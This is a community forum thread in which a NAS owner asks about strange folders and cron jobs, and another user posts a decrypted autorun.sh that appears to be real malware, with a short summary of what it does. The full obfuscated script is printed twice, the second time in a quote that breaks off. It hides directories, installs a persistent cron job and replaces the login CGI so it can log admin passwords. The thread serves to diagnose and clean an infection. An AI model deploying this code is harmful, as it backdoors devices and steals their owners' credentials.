Strange folders and cronjobs
-
dolbyman
- Guru
- Posts: 21190
- Joined: Sat Feb 12, 2011 2:11 am
- Location: Vancouver BC , Canada
Re: Strange folders and cronjobs
8TB external drives are cheap..should be plenty of space for movies
-
benzo83
- Starting out
- Posts: 28
- Joined: Wed Nov 18, 2015 4:50 am
Re: Strange folders and cronjobs
dolbyman wrote:8TB external drives are cheap..should be plenty of space for movies
not too cheap 300euro :/
-
dolbyman
- Guru
- Posts: 21190
- Joined: Sat Feb 12, 2011 2:11 am
- Location: Vancouver BC , Canada
-
Don
- Guru
- Posts: 12021
- Joined: Thu Jan 03, 2008 4:56 am
- Location: Long Island, New York
Re: Strange folders and cronjobs
benzo83 wrote:Can i safetely remove these files? Can any QNAP'S employee answer me?
No QNAP's employees cannot answer you. This is a community forum and not a QNAP support channel. If you want an answer from QNAP then you need to open a ticket.
Read the Online Manuals and use the forum search feature before posting.
It is a recommended to use RAID and have external backups. RAID will protect you from disk failure, keep your system running, and data accessible while the disk is replaced and the RAID rebuilt. Backups will allow you to recover data that is lost or corrupted, or from system failure. One does not replace the other.
Submit bugs and feature requests to QNAP via their Helpdesk app.
NAS: TVS-882BR | F/W: 4.3.6.0895 | 40GB | 2 x M.2 SATA RAID 1 (System/VMs) | 4 x M.2 NMVe QM2-4P-384A RAID 5 (Cache) | 5 x 4TB HDD RAID 6 (Data) | 1 x Blu-ray
NAS: TVS-663 | F/W: 4.5.1.1540 | 16GB | 2 x M.2 NMVe QM2-2P RAID 1 (Cache) | 4 x 4TB RAID 5
Apps: Boinc, Squid, DNSMasq, PLEX, iDrive, QVPN, QLMS, MP3fs, HBS, Entware, DLstation, +others
It is a recommended to use RAID and have external backups. RAID will protect you from disk failure, keep your system running, and data accessible while the disk is replaced and the RAID rebuilt. Backups will allow you to recover data that is lost or corrupted, or from system failure. One does not replace the other.
Submit bugs and feature requests to QNAP via their Helpdesk app.
NAS: TVS-882BR | F/W: 4.3.6.0895 | 40GB | 2 x M.2 SATA RAID 1 (System/VMs) | 4 x M.2 NMVe QM2-4P-384A RAID 5 (Cache) | 5 x 4TB HDD RAID 6 (Data) | 1 x Blu-ray
NAS: TVS-663 | F/W: 4.5.1.1540 | 16GB | 2 x M.2 NMVe QM2-2P RAID 1 (Cache) | 4 x 4TB RAID 5
Apps: Boinc, Squid, DNSMasq, PLEX, iDrive, QVPN, QLMS, MP3fs, HBS, Entware, DLstation, +others
-
Mousetick
- Been there, done that
- Posts: 592
- Joined: Thu Aug 24, 2017 10:28 pm
Re: Strange folders and cronjobs
This is a nasty piece of sh.itware you've got there.
I decrypted the autorun.sh (see further below).
I can't spend the time to read and understand what all the script code does, I'm not paid for that, it's QNAP's job, and the tight code gives me a headache, but here is what I can make of it:
- It makes various configuration checks
- It creates a bunch of hidden directories in various places
- It unpacks a compressed tarball and installs its contents in the previous directories and other places
- It checks if the admin password is the default
- It installs a CGI script that intercepts the QTS login so it can steal the admin password if it's not the default
- It installs cron jobs
- It installs SSH and UPNP programs
So even if you change the admin password, chances are that you are still toast. Your best defense, short of reinitializing the NAS from scratch, is to disconnect the NAS from the network, not just from the Internet, but from your network altogether. Keep it air-gaped until you are certain that the NAS is clean, and you have educated yourself on proper security practices and how to protect your router, your network, your computer(s) and your NAS against nasties.
Decrypted autorun.sh:
I decrypted the autorun.sh (see further below).
I can't spend the time to read and understand what all the script code does, I'm not paid for that, it's QNAP's job, and the tight code gives me a headache, but here is what I can make of it:
- It makes various configuration checks
- It creates a bunch of hidden directories in various places
- It unpacks a compressed tarball and installs its contents in the previous directories and other places
- It checks if the admin password is the default
- It installs a CGI script that intercepts the QTS login so it can steal the admin password if it's not the default
- It installs cron jobs
- It installs SSH and UPNP programs
So even if you change the admin password, chances are that you are still toast. Your best defense, short of reinitializing the NAS from scratch, is to disconnect the NAS from the network, not just from the Internet, but from your network altogether. Keep it air-gaped until you are certain that the NAS is clean, and you have educated yourself on proper security practices and how to protect your router, your network, your computer(s) and your NAS against nasties.
Decrypted autorun.sh:
Code: Select all
#!/bin/sh
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
//I;s/\(^\|\
\)\[[^\
]\+\]\
.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
bdir=
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
arch_o=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo x86 || echo arm`
upnpbin=$(echo IHu`echo -ne "\\x70\\x73\\x75\\x72"`iSU`echo -ne "\\x66\\x6d\\x6b\\x70"` | tr "SDkYwfvrzzYMiCUcEaImyEaP" "kthefyrfFVeCnDvXyqvfYPzR")
cgi=$(echo a`echo -ne "\\x6a\\x6d"`SVy`echo -ne "\\x62\\x74\\x64\\x76"`pE`echo -ne "\\x6c\\x78\\x65"` | tr "pRymvOeuSRSmMZEeGIMRB" "rj.QhzgEoEd.ALxVmEFsB")
sshbin=$(echo O`echo -ne "\\x72\\x70"`zsu`echo -ne "\\x79\\x63\\x68\\x63"` | tr "xjWHiEYgzocaEyKIBwFS" "MrTFiJGZEPhRIcZnfFhT")
sshhkey=$(echo RrP`echo -ne "\\x6c\\x72\\x76\\x71"`Lc`echo -ne "\\x66\\x6c\\x71"`Rv`echo -ne "\\x6d\\x6b\\x65"` | tr "sVqsTJsNcJPKuLoxugtmPSrv" "InRreWNeZt.pPZAtCdhhcamb")
sshauth=$(echo iN`echo -ne "\\x61\\x6a\\x66"`n`echo -ne "\\x62\\x71"`VCB`echo -ne "\\x70\\x7a\\x69\\x76"` | tr "hauNqrNprUetkKAdZLBafo" "MaPTVgjuDrn.wuzCzeLfox")
sshconf=$(echo QG`echo -ne "\\x6d\\x6c\\x75"`P`echo -ne "\\x76\\x73"` | tr "FixDfMglHsQQJEiRSPLdIxPj" "gCKpGjffRBUUpRSrgDLpAPrH")
archarm=$(echo oS`echo -ne "\\x75\\x6f\\x63"`Ie`echo -ne "\\x66\\x65\\x63"` | tr "gvDHDJFnerSYCWLeEqQXIHY" "lFVogPcyAiqRzTdpoCZBtXn")
archx86=$(echo B`echo -ne "\\x70\\x71"`Tx`echo -ne "\\x69\\x77\\x75"`fP`echo -ne "\\x67\\x79\\x69"` | tr "XlAsnKrbjXXpZbMdCfsrY" "xeNfamiqkSwmmJTyHkPcr")
ipath=$(echo KZ`echo -ne "\\x61\\x73\\x72"`mRQ`echo -ne "\\x69\\x65\\x6b\\x61"` | tr "dkdbaKGBeThGSsJcYKVLwz" ".VwDEtExkUllASJBIkSUnB")
crons=$(echo i`echo -ne "\\x69\\x76"`YzW`echo -ne "\\x73\\x73\\x69\\x72"` | tr "OwnRESmebMGYByfUjprk" "bYGVwvwuIKswzlOxluSY")
arch=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo "$archx86" || echo "$archarm"`
test -f "./${arch}" && sdir=`pwd` || { test "${BASH_SOURCE[0]}" && sdir=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd ) || { test "${0}" && sdir=$( cd "$( dirname "${0}" )" && pwd ); } && test -f "${sdir}/${arch}" && cd "${sdir}"; } || { test -f "/tmp/config/${arch}" && cd /tmp/config; } || {
mdir=$(mktemp -d /tmp/.mount.XXXXXX) || { mdir=/tmp/.mount.jbbxQob; mkdir ${mdir}; }
__BOOT_DEV=
__model=`getcfg System "Internal Model"`
CONFIG_DEV_NODE=`getcfg "CONFIG STORAGE" DEVICE_NODE -f /etc/platform.conf`
CONFIG_DEV_PART=`getcfg "CONFIG STORAGE" FS_ACTIVE_PARTITION -f /etc/platform.conf`
CONFIG_DEV_FS=`getcfg "CONFIG STORAGE" FS_TYPE -f /etc/platform.conf`
__BOOT_CONF=`test -f /etc/default_config/BOOT.conf && cat /etc/default_config/BOOT.conf 2>/dev/null || cat "${confdir}/BOOT.conf"` || { test "$arch_o" = arm && __BOOT_CONF=TS-NASARM; }
command -v hal_app > /dev/null 2>&1 && { __BOOT_DEV=$(hal_app --get_boot_pd port_id=0); }
test "${__BOOT_CONF}" = TS-NASARM || test "$arch_o" = arm && { test -f /etc/IS_TAS && __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}7" || __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}5"; } || __BOOT_DEV="${__BOOT_DEV:-/dev/sdx}6"
test "x${CONFIG_DEV_NODE}" != "x" && { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}" > /dev/null 2>&1 || { test -f /etc/IS_TAS && mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } } || mount ${__BOOT_DEV} -t ext2 ${mdir} || { test "${__model}" = "TS-201" && mount -t ext2 /dev/mtdblock4 ${mdir}; } || { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}"; mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } || { test "${__model}" = "TS-269L" && mount -t ext2 /dev/sdc6 ${mdir}; } || { test "${__model}" = "TS-869" && mount -t ext2 /dev/sdi6 ${mdir}; } || { test "$arch_o" = arm || ${__BOOT_CONF} = "TS-NASARM" && { for i in 5 7 4 6 3 8; do mount -t ext2 "/dev/mtdblock${i}" ${mdir} && break; done; }; } || { test "$arch_o" = x86 && for n in /dev/sdc /dev/sdx /dev/sdi $__BOOT_DEV; do for i in 6 $CONFIG_DEV_PART; do mount -t ext2 ${n}${i} ${mdir} && break 2; done; done; } || { mount -t ext2 $(/sbin/hal_app --get_boot_pd port_id=0)6 ${mdir}; }; }
for file in "${sshbin}" "${upnpbin}" "."; do test -f "${bdir}/.${ipath}/${file}" || break; done
test "$file" != "." || test ! -f "${bdir}/.${ipath}/${crons}.sh" && { test -s .BOOT_TIME && read -r boottime < .BOOT_TIME || echo `date +%s` > .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME" || echo `date +%s` > "${bdir}/.BOOT_TIME"; test "$boottime" || { read -r boottime < .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME"; }; test "$boottime" && { sleep 2; [ $boottime -gt 0 ] && e=$(( `date +%s` - $boottime )) && [ $e -gt 0 ] && [ $e -lt 1296000 ] && { test "$mdir" && test -e "${mdir}" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & }; noex=1; }; }; }
test "$noex" = 1 || {
rm "${bdir}/.BOOT_TIME"
rm .BOOT_TIME
test ! -f "./${arch}" && test -d "${mdir}" && test -f "${mdir}/${arch}" && cd "${mdir}"
tdir=`mktemp -d "${bdir}/.temp.XXXXXX" || mktemp -d "/share/Public/.temp.XXXXXX" || mktemp -d "/mnt/HDA_ROOT/.temp.XXXXXX"`
test -d "$tdir" || { for i in "$bdir" "/share/Public" "/mnt/HDA_ROOT"; do mkdir "${i}/.temp.jbbxQob" > /dev/null 2>&1 && test -d "${i}/.temp.jbbxQob" && tdir="${i}/.temp.jbbxQob"; done;
test -d "$tdir"; } || { tdir=`mktemp -d /tmp/.temp.XXXXXX` && test -d "$tdir"; } || { mkdir "/tmp/.temp.jbbxQob" && tdir=/tmp/.temp.jbbxQob && test -d "$tdir"; } || { tdir=`mktemp -d .XXXXXX` && test -d "$tdir"; } || { mkdir ".jbbxQob" && tdir=".jbbxQob" && test -d "$tdir"; } || tdir=`pwd`
cp "${arch}" ${tdir}
cd ${tdir}
tar -xzf "${arch}"
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
EOF
test "$fgrep" || fgrep=grep
test -d "${bdir}/.${ipath}" || mkdir -p "${bdir}/.${ipath}" || mkdir "${bdir}/.${ipath}"
test -f "$cgi" && chmod 755 "$cgi" && "./${cgi}"
test -f /tmp/qpkg.conf.bak && { touch -cr /tmp/qpkg.conf.bak "${confdir}/qpkg.conf"; rm /tmp/qpkg.conf.bak; }
cp -p ${crons} "${bdir}/.${ipath}/${crons}.sh" || { cp ${crons} "${bdir}/.${ipath}/${crons}.sh"; touch -cr /bin/busybox "${bdir}/.${ipath}/${crons}.sh"; }
chmod 755 "${bdir}/.${ipath}/${crons}.sh"
if [ -f "${confdir}/crontab" ]; then
test "$RANDOM" || RANDOM=12499
test $(( $RANDOM & 1 )) = 0 && space=' ' || space=''
cronmins="$(( $RANDOM % 4 ))"
test ! "$cronmins" -eq 0 && cronmins="${cronmins}0"
$fgrep "${bdir}/.${ipath}/${crons}.sh" "${confdir}/crontab" >/dev/null 2>&1 || { l=$(( (`wc -l < "${confdir}/crontab"` / 3) + 1)); test "$l" -gt 0 && sed -i "${l}"'i'"$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1' "${confdir}/crontab" || echo "$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1"' >> "${confdir}/crontab" && /etc/init.d/crond.sh restart > /dev/null 2>&1 && touch -cr ${confdir}/apache ${confdir}/crontab; }
fi
for file in "${sshbin}" "${upnpbin}"; do test -f "${bdir}/.${ipath}/${file}" || cp -p "${file}" "${bdir}/.${ipath}/${file}" || { cp "${file}" "${bdir}/.${ipath}/${file}"; touch -cr /bin/busybox "${bdir}/.${ipath}/${file}"; } done
chmod 755 "${bdir}/.${ipath}/${sshbin}"
chmod 755 "${bdir}/.${ipath}/${upnpbin}"
grep 'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:' /etc/shadow >/dev/null 2>&1 && {
! test -d "${bdir}/.log" && mkdir "${bdir}/.log"
! test -f /home/httpd/cgi-bin/QTSauthLogin.cgi && { cp -p /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi || cp /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi; } && echo '#!/bin/sh
POSTDATA=""
test "x${REQUEST_METHOD}" = xPOST && {
case "${CONTENT_LENGTH}" in '"''"' | *[!0-9]* | 0* ) false ;; *) test "${CONTENT_LENGTH}" -lt 2147483646 ;; esac && { IFS= read -d '"''"' -rn "${CONTENT_LENGTH}" POSTDATA; test -z "$POSTDATA" && POSTDATA=`dd bs=1 count="$CONTENT_LENGTH" 2>/dev/null`; } || test "$POSTDATA" || POSTDATA=`cat`
test ! -z "$POSTDATA" && case "${POSTDATA}" in *pwd*) test -f "'${bdir}'/.log/.cgi_log" || { test -d "'${bdir}'/.log" || mkdir -p "'${bdir}'/.log" && touch "'${bdir}'/.log/.cgi_log"; } && test $((`stat -c '"'"'%s'"'"' "'${bdir}'/.log/.cgi_log"`)) -lt 209715200 && cat >> "'${bdir}'/.log/.cgi_log" << EOF ;; esac;
$REMOTE_ADDR:$POSTDATA
EOF
}
test ! -z "$POSTDATA" && case "$POSTDATA" in *user=admin* ) true ;; *) false ;; esac || case "$QUERY_STRING" in *user=admin*) true ;; *) false ;; esac && {
case "${REMOTE_ADDR}" in '"''"' | 10.* | 127.* | 192.168.* | 169.254.* | 172.1[6-9].* | 172.2[0-9].* | 172.3[01].* | *:* ) false ;; *) true ;; esac && grep '"'"'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:'"'"' /etc/shadow >/dev/null 2>/dev/null && exit 0
}
if ! test -z "$POSTDATA"; then
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi << V4KLDmYwvc
$POSTDATA
V4KLDmYwvc
else
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi
fi
exit 0' > /home/httpd/cgi-bin/_authLogin.cgi
test "$?" = 0 && test -s /home/httpd/cgi-bin/_authLogin.cgi && test -s /home/httpd/cgi-bin/QTSauthLogin.cgi && mv /home/httpd/cgi-bin/_authLogin.cgi /home/httpd/cgi-bin/authLogin.cgi && chmod 755 /home/httpd/cgi-bin/authLogin.cgi && touch -cr /home/httpd/cgi-bin/QTSauthLogin.cgi /home/httpd/cgi-bin/authLogin.cgi
}
. "${bdir}/.${ipath}/${crons}.sh"
cd "${sdir}"
rm -rf "${tdir}"
test "$mdir" && test -d "$mdir" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & }
true;
}
#]-
benzo83
- Starting out
- Posts: 28
- Joined: Wed Nov 18, 2015 4:50 am
Re: Strange folders and cronjobs
Mousetick wrote:This is a nasty piece of sh.itware you've got there.
I decrypted the autorun.sh (see further below).
I can't spend the time to read and understand what all the script code does, I'm not paid for that, it's QNAP's job, and the tight code gives me a headache, but here is what I can make of it:
- It makes various configuration checks
- It creates a bunch of hidden directories in various places
- It unpacks a compressed tarball and installs its contents in the previous directories and other places
- It checks if the admin password is the default
- It installs a CGI script that intercepts the QTS login so it can steal the admin password if it's not the default
- It installs cron jobs
- It installs SSH and UPNP programs
So even if you change the admin password, chances are that you are still toast. Your best defense, short of reinitializing the NAS from scratch, is to disconnect the NAS from the network, not just from the Internet, but from your network altogether. Keep it air-gaped until you are certain that the NAS is clean, and you have educated yourself on proper security practices and how to protect your router, your network, your computer(s) and your NAS against nasties.
Decrypted autorun.sh:Code: Select all
#!/bin/sh
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
//I;s/\(^\|\
\)\[[^\
]\+\]\
.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
bdir=
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
arch_o=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo x86 || echo arm`
upnpbin=$(echo IHu`echo -ne "\\x70\\x73\\x75\\x72"`iSU`echo -ne "\\x66\\x6d\\x6b\\x70"` | tr "SDkYwfvrzzYMiCUcEaImyEaP" "kthefyrfFVeCnDvXyqvfYPzR")
cgi=$(echo a`echo -ne "\\x6a\\x6d"`SVy`echo -ne "\\x62\\x74\\x64\\x76"`pE`echo -ne "\\x6c\\x78\\x65"` | tr "pRymvOeuSRSmMZEeGIMRB" "rj.QhzgEoEd.ALxVmEFsB")
sshbin=$(echo O`echo -ne "\\x72\\x70"`zsu`echo -ne "\\x79\\x63\\x68\\x63"` | tr "xjWHiEYgzocaEyKIBwFS" "MrTFiJGZEPhRIcZnfFhT")
sshhkey=$(echo RrP`echo -ne "\\x6c\\x72\\x76\\x71"`Lc`echo -ne "\\x66\\x6c\\x71"`Rv`echo -ne "\\x6d\\x6b\\x65"` | tr "sVqsTJsNcJPKuLoxugtmPSrv" "InRreWNeZt.pPZAtCdhhcamb")
sshauth=$(echo iN`echo -ne "\\x61\\x6a\\x66"`n`echo -ne "\\x62\\x71"`VCB`echo -ne "\\x70\\x7a\\x69\\x76"` | tr "hauNqrNprUetkKAdZLBafo" "MaPTVgjuDrn.wuzCzeLfox")
sshconf=$(echo QG`echo -ne "\\x6d\\x6c\\x75"`P`echo -ne "\\x76\\x73"` | tr "FixDfMglHsQQJEiRSPLdIxPj" "gCKpGjffRBUUpRSrgDLpAPrH")
archarm=$(echo oS`echo -ne "\\x75\\x6f\\x63"`Ie`echo -ne "\\x66\\x65\\x63"` | tr "gvDHDJFnerSYCWLeEqQXIHY" "lFVogPcyAiqRzTdpoCZBtXn")
archx86=$(echo B`echo -ne "\\x70\\x71"`Tx`echo -ne "\\x69\\x77\\x75"`fP`echo -ne "\\x67\\x79\\x69"` | tr "XlAsnKrbjXXpZbMdCfsrY" "xeNfamiqkSwmmJTyHkPcr")
ipath=$(echo KZ`echo -ne "\\x61\\x73\\x72"`mRQ`echo -ne "\\x69\\x65\\x6b\\x61"` | tr "dkdbaKGBeThGSsJcYKVLwz" ".VwDEtExkUllASJBIkSUnB")
crons=$(echo i`echo -ne "\\x69\\x76"`YzW`echo -ne "\\x73\\x73\\x69\\x72"` | tr "OwnRESmebMGYByfUjprk" "bYGVwvwuIKswzlOxluSY")
arch=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo "$archx86" || echo "$archarm"`
test -f "./${arch}" && sdir=`pwd` || { test "${BASH_SOURCE[0]}" && sdir=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd ) || { test "${0}" && sdir=$( cd "$( dirname "${0}" )" && pwd ); } && test -f "${sdir}/${arch}" && cd "${sdir}"; } || { test -f "/tmp/config/${arch}" && cd /tmp/config; } || {
mdir=$(mktemp -d /tmp/.mount.XXXXXX) || { mdir=/tmp/.mount.jbbxQob; mkdir ${mdir}; }
__BOOT_DEV=
__model=`getcfg System "Internal Model"`
CONFIG_DEV_NODE=`getcfg "CONFIG STORAGE" DEVICE_NODE -f /etc/platform.conf`
CONFIG_DEV_PART=`getcfg "CONFIG STORAGE" FS_ACTIVE_PARTITION -f /etc/platform.conf`
CONFIG_DEV_FS=`getcfg "CONFIG STORAGE" FS_TYPE -f /etc/platform.conf`
__BOOT_CONF=`test -f /etc/default_config/BOOT.conf && cat /etc/default_config/BOOT.conf 2>/dev/null || cat "${confdir}/BOOT.conf"` || { test "$arch_o" = arm && __BOOT_CONF=TS-NASARM; }
command -v hal_app > /dev/null 2>&1 && { __BOOT_DEV=$(hal_app --get_boot_pd port_id=0); }
test "${__BOOT_CONF}" = TS-NASARM || test "$arch_o" = arm && { test -f /etc/IS_TAS && __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}7" || __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}5"; } || __BOOT_DEV="${__BOOT_DEV:-/dev/sdx}6"
test "x${CONFIG_DEV_NODE}" != "x" && { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}" > /dev/null 2>&1 || { test -f /etc/IS_TAS && mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } } || mount ${__BOOT_DEV} -t ext2 ${mdir} || { test "${__model}" = "TS-201" && mount -t ext2 /dev/mtdblock4 ${mdir}; } || { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}"; mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } || { test "${__model}" = "TS-269L" && mount -t ext2 /dev/sdc6 ${mdir}; } || { test "${__model}" = "TS-869" && mount -t ext2 /dev/sdi6 ${mdir}; } || { test "$arch_o" = arm || ${__BOOT_CONF} = "TS-NASARM" && { for i in 5 7 4 6 3 8; do mount -t ext2 "/dev/mtdblock${i}" ${mdir} && break; done; }; } || { test "$arch_o" = x86 && for n in /dev/sdc /dev/sdx /dev/sdi $__BOOT_DEV; do for i in 6 $CONFIG_DEV_PART; do mount -t ext2 ${n}${i} ${mdir} && break 2; done; done; } || { mount -t ext2 $(/sbin/hal_app --get_boot_pd port_id=0)6 ${mdir}; }; }
for file in "${sshbin}" "${upnpbin}" "."; do test -f "${bdir}/.${ipath}/${file}" || break; done
test "$file" != "." || test ! -f "${bdir}/.${ipath}/${crons}.sh" && { test -s .BOOT_TIME && read -r boottime < .BOOT_TIME || echo `date +%s` > .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME" || echo `date +%s` > "${bdir}/.BOOT_TIME"; test "$boottime" || { read -r boottime < .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME"; }; test "$boottime" && { sleep 2; [ $boottime -gt 0 ] && e=$(( `date +%s` - $boottime )) && [ $e -gt 0 ] && [ $e -lt 1296000 ] && { test "$mdir" && test -e "${mdir}" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & }; noex=1; }; }; }
test "$noex" = 1 || {
rm "${bdir}/.BOOT_TIME"
rm .BOOT_TIME
test ! -f "./${arch}" && test -d "${mdir}" && test -f "${mdir}/${arch}" && cd "${mdir}"
tdir=`mktemp -d "${bdir}/.temp.XXXXXX" || mktemp -d "/share/Public/.temp.XXXXXX" || mktemp -d "/mnt/HDA_ROOT/.temp.XXXXXX"`
test -d "$tdir" || { for i in "$bdir" "/share/Public" "/mnt/HDA_ROOT"; do mkdir "${i}/.temp.jbbxQob" > /dev/null 2>&1 && test -d "${i}/.temp.jbbxQob" && tdir="${i}/.temp.jbbxQob"; done;
test -d "$tdir"; } || { tdir=`mktemp -d /tmp/.temp.XXXXXX` && test -d "$tdir"; } || { mkdir "/tmp/.temp.jbbxQob" && tdir=/tmp/.temp.jbbxQob && test -d "$tdir"; } || { tdir=`mktemp -d .XXXXXX` && test -d "$tdir"; } || { mkdir ".jbbxQob" && tdir=".jbbxQob" && test -d "$tdir"; } || tdir=`pwd`
cp "${arch}" ${tdir}
cd ${tdir}
tar -xzf "${arch}"
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
EOF
test "$fgrep" || fgrep=grep
test -d "${bdir}/.${ipath}" || mkdir -p "${bdir}/.${ipath}" || mkdir "${bdir}/.${ipath}"
test -f "$cgi" && chmod 755 "$cgi" && "./${cgi}"
test -f /tmp/qpkg.conf.bak && { touch -cr /tmp/qpkg.conf.bak "${confdir}/qpkg.conf"; rm /tmp/qpkg.conf.bak; }
cp -p ${crons} "${bdir}/.${ipath}/${crons}.sh" || { cp ${crons} "${bdir}/.${ipath}/${crons}.sh"; touch -cr /bin/busybox "${bdir}/.${ipath}/${crons}.sh"; }
chmod 755 "${bdir}/.${ipath}/${crons}.sh"
if [ -f "${confdir}/crontab" ]; then
test "$RANDOM" || RANDOM=12499
test $(( $RANDOM & 1 )) = 0 && space=' ' || space=''
cronmins="$(( $RANDOM % 4 ))"
test ! "$cronmins" -eq 0 && cronmins="${cronmins}0"
